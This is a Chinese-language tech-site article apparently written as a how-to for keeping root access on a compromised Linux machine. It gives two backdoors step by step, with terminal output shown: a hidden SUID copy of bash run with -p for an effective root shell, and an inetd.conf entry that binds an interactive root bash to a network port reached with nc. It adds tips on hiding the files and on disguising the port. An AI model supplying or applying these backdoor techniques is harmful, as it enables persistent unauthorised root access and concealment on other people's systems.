当前位置:主页>科 研>学术交流>

Linux后门的两种姿势:suid shell与inetd后门

前提:

你现在已经是root用户, 想留一个后门。



 

系统环境:

dawg:~# uname -a

Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

1、SUID shell

首先, 先切换成为root用户,并执行以下的命令:

dawg:~# cp /bin/bash /.woot

dawg:~# chmod 4755 /.woot

dawg:~# ls -al /.woot

-rwsr-xr-x 1 root root 690668 Jul 24 17:14 /.woot

当然, 你也可以起其他更具备隐藏性的名字,我想猥琐并机智的你,肯定能想出很多好的名字的。文件前面的那一点也不是必要的,只是为了隐藏文件( 在文件名的最前面加上“.”,就可以在任意文件目录下进行隐藏) 。

现在,做为一个普通用户,我们来启用这个后门:

fw@dawg:~$ id

uid=1000(fw) gid=1000(fw) groups=1000(fw)

fw@dawg:~$ /.woot

.woot-2.05b$ id

uid=1000(fw) gid=1000(fw) groups=1000(fw)

.woot-2.05b$

为什么不行呢?

因为 bash2 针对 suid有一些护卫的措施. 但这也不是不可破的:

.woot-2.05b$ /.woot -p

.woot-2.05b# id

uid=1000(fw) gid=1000(fw) euid=0(root) groups=1000(fw)

使用-p参数来获取一个root shell. 这个euid的意思是 effective user id(关于这些ID的知识,可以戳这里)

这里要特别注意的是,作为一个普通用户执行这个SUID shell时,一定要使用全路径。

小知识:

如何查找那些具有SUID 的文件:

dawg:~# find / -perm +4000 -ls

这时就会返回具有SUID位的文件啦。

2、 远程后门:利用 /etc/inetd.conf

我们使用vi来修改 /etc/inetd.conf 文件

原文件:

#chargen dgram udp wait root internal

#discard stream tcp nowait root internal

#discard dgram udp wait root internal

#daytime stream tcp nowait root internal

修改为:

#discard stream tcp nowait root internal

#discard dgram udp wait root internal

daytime stream tcp nowait root /bin/bash bash -i

开启inetd:

dawg:~# inetd

如果要强制重启inetd:

dawg:~# ps -ef | grep inetd

root 362 1 0 Jul22 ? 00:00:00 /usr/sbin/inetd

root 13769 13643 0 17:51 pts/1 00:00:00 grep inetd

dawg:~# kill -HUP 362

现在我们就可以用nc来爆菊了:

C:tools

192.168.1.77: inverse host lookup failed: h_errno 11004: NO_DATA

(UNKNOWN) [192.168.1.77] 13 (daytime) open

bash: no job control in this shell

bash-2.05b# bash-2.05b#

bash-2.05b# id

uid=0(root) gid=0(root) groups=0(root)

bash-2.05b# uname -a

Linux dawg 2.4.20-1-386 #3 Sat Mar 22 12:11:40 EST 2003 i686 GNU/Linux

小贴士:

我们可以修改/etc/services文件,加入以下的东西:

woot 6666/tcp #evil backdoor service

然后修改/etc/inetd.conf :

woot stream tcp nowait root /bin/bash bash -i

我们可以修改成一些常见的端口,以实现隐藏。

(责任编辑:安博涛)

分享到:

更多
发表评论
请自觉遵守互联网相关的政策法规,严禁发布色情、暴力、反动的言论。
评价:
表情:
  • 微笑/wx
  • 撇嘴/pz
  • 抓狂/zk
  • 流汗/lh
  • 大兵/db
  • 奋斗/fd
  • 疑问/yw
  • 晕/y
  • 偷笑/wx
  • 可爱/ka
  • 傲慢/am
  • 惊恐/jk
用户名: 验证码:点击我更换图片
资料下载专区
图文资讯

容器是如何让“一切都是代码”成为现实的

容器是如何让“一切都是代码”成为现实的

现代应用的发展在很大程度上要归功于DevOps运动的蓬勃兴起以及该运动所产生的各种自动...[详细]

如何快速掌握一门新技术/语言/框架

如何快速掌握一门新技术/语言/框架

IT行业中的企业特点是都属于知识密集型企业。这种企业的核心竞争力与员工的知识和技能...[详细]

建高效数据中心有径可循

建高效数据中心有径可循

能耗问题一直是各大数据中心的心头之痛。有数据表明,2015年我国数据中心能耗预计将高...[详细]

2015黑帽大会:网络灾难后 重建IT安全

2015黑帽大会:网络灾难后 重建IT安全

在遭遇网络灾难后重建IT安全似乎是不可能完成的任务,但根据安全专家Christina Kubeck...[详细]

面对DNS劫持 企业移动应用该如何防护?

面对DNS劫持 企业移动应用该如何防护?

DNS(Domain Name System)劫持又称域名劫持,是指对正常的域名解析请求加以拦截,转而...[详细]

返回首页 返回顶部